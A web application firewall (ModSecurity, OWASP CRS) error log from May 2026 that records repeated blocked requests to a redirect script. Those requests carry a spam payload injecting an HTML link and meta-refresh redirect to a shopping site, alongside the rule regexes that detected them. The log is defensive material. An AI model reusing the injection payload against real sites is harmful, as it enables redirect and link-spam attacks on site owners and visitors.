[Mon May 11 19:49:09.256751 2026] [security2:error] [pid 1516058:tid 1516112] [client 27.78.84.116:56761] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWlSMeXtzav-mi9SyaFwAAANY"]
[Mon May 11 19:49:13.722813 2026] [security2:error] [pid 1501883:tid 1501889] [client 27.78.84.116:57223] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWmTP5Q_-MBliRCAxREAAAAAQ"]
[Mon May 11 19:49:13.745759 2026] [security2:error] [pid 1501883:tid 1501889] [client 27.78.84.116:57223] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-a..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWmTP5Q_-MBliRCAxREAAAAAQ"]
[Mon May 11 19:49:13.772962 2026] [security2:error] [pid 1501883:tid 1501889] [client 27.78.84.116:57223] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/X [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWmTP5Q_-MBliRCAxREAAAAAQ"]
[Mon May 11 19:49:13.782470 2026] [security2:error] [pid 1501883:tid 1501889] [client 27.78.84.116:57223] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WE [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWmTP5Q_-MBliRCAxREAAAAAQ"]
[Mon May 11 19:49:13.823821 2026] [security2:error] [pid 1501883:tid 1501889] [client 27.78.84.116:57223] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWmTP5Q_-MBliRCAxREAAAAAQ"]
[Mon May 11 19:49:13.824305 2026] [security2:error] [pid 1501883:tid 1501889] [client 27.78.84.116:57223] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWmTP5Q_-MBliRCAxREAAAAAQ"]
[Mon May 11 19:49:13.833865 2026] [security2:error] [pid 1501883:tid 1501889] [client 27.78.84.116:57223] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWmTP5Q_-MBliRCAxREAAAAAQ"]
[Mon May 11 19:49:15.223639 2026] [security2:error] [pid 1511173:tid 1511200] [client 43.157.38.131:47100] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/plan-du-camping-prairies-de-la-mer-rent-paradise/"] [unique_id "agIWm_jVc-A-CSptvm1cdwAAAFg"]
[Mon May 11 19:49:18.838935 2026] [security2:error] [pid 1511173:tid 1511178] [client 27.78.84.116:57602] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWnvjVc-A-CSptvm1cegAAAEI"]
[Mon May 11 19:49:18.840002 2026] [security2:error] [pid 1511173:tid 1511178] [client 27.78.84.116:57602] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-a..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWnvjVc-A-CSptvm1cegAAAEI"]
[Mon May 11 19:49:18.844194 2026] [security2:error] [pid 1511173:tid 1511178] [client 27.78.84.116:57602] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/X [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWnvjVc-A-CSptvm1cegAAAEI"]
[Mon May 11 19:49:18.844315 2026] [security2:error] [pid 1511173:tid 1511178] [client 27.78.84.116:57602] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WE [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWnvjVc-A-CSptvm1cegAAAEI"]
[Mon May 11 19:49:18.848118 2026] [security2:error] [pid 1511173:tid 1511178] [client 27.78.84.116:57602] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWnvjVc-A-CSptvm1cegAAAEI"]
[Mon May 11 19:49:18.848576 2026] [security2:error] [pid 1511173:tid 1511178] [client 27.78.84.116:57602] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWnvjVc-A-CSptvm1cegAAAEI"]
[Mon May 11 19:49:18.849844 2026] [security2:error] [pid 1511173:tid 1511178] [client 27.78.84.116:57602] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWnvjVc-A-CSptvm1cegAAAEI"]
[Mon May 11 19:49:22.414586 2026] [security2:error] [pid 1501831:tid 1501847] [client 27.78.84.116:58018] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWolNddpkriGUb6ZVgHgAAAQ4"]
[Mon May 11 19:49:22.415751 2026] [security2:error] [pid 1501831:tid 1501847] [client 27.78.84.116:58018] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-a..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWolNddpkriGUb6ZVgHgAAAQ4"]
[Mon May 11 19:49:22.416926 2026] [security2:error] [pid 1501831:tid 1501847] [client 27.78.84.116:58018] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/X [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWolNddpkriGUb6ZVgHgAAAQ4"]
[Mon May 11 19:49:22.418343 2026] [security2:error] [pid 1501831:tid 1501847] [client 27.78.84.116:58018] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WE [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWolNddpkriGUb6ZVgHgAAAQ4"]
[Mon May 11 19:49:22.419596 2026] [security2:error] [pid 1501831:tid 1501847] [client 27.78.84.116:58018] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWolNddpkriGUb6ZVgHgAAAQ4"]
[Mon May 11 19:49:22.420003 2026] [security2:error] [pid 1501831:tid 1501847] [client 27.78.84.116:58018] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWolNddpkriGUb6ZVgHgAAAQ4"]
[Mon May 11 19:49:22.420265 2026] [security2:error] [pid 1501831:tid 1501847] [client 27.78.84.116:58018] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWolNddpkriGUb6ZVgHgAAAQ4"]
[Mon May 11 19:49:34.703432 2026] [security2:error] [pid 1501883:tid 1501901] [client 34.231.118.144:40392] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS_NAMES:php echo BASEFRONT ?>img/formation/cas/miniature/<?php echo $image ?>. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS_NAMES:php echo BASEFRONT ?>img/formation/cas/miniature/<?php echo $image ?>: php echo basefront ?>img/formation/cas/miniature/<?php echo $image ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agIWrjP5Q_-MBliRCAxRLgAAABA"]
